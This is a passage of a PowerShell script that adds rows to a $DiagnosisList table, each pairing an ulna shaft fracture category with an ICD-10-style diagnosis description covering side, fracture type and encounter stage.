$DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left ulna","Unspecified fracture of shaft of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified ulna","Unspecified fracture of shaft of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of right ulna","Greenstick fracture of shaft of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of right ulna","Greenstick fracture of shaft of right ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of right ulna","Greenstick fracture of shaft of right ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of right ulna","Greenstick fracture of shaft of right ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of right ulna","Greenstick fracture of shaft of right ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of right ulna","Greenstick fracture of shaft of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of left ulna","Greenstick fracture of shaft of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of left ulna","Greenstick fracture of shaft of left ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of left ulna","Greenstick fracture of shaft of left ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of left ulna","Greenstick fracture of shaft of left ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of left ulna","Greenstick fracture of shaft of left ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of left ulna","Greenstick fracture of shaft of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of unspecified ulna","Greenstick fracture of shaft of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of unspecified ulna","Greenstick fracture of shaft of unspecified ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of unspecified ulna","Greenstick fracture of shaft of unspecified ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of unspecified ulna","Greenstick fracture of shaft of unspecified ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of unspecified ulna","Greenstick fracture of shaft of unspecified ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of unspecified ulna","Greenstick fracture of shaft of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right ulna","Displaced transverse fracture of shaft of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left ulna","Displaced transverse fracture of shaft of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified ulna","Displaced transverse fracture of shaft of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right ulna","Nondisplaced transverse fracture of shaft of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left ulna","Nondisplaced transverse fracture of shaft of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified ulna","Nondisplaced transverse fracture of shaft of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right ulna","Displaced oblique fracture of shaft of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique 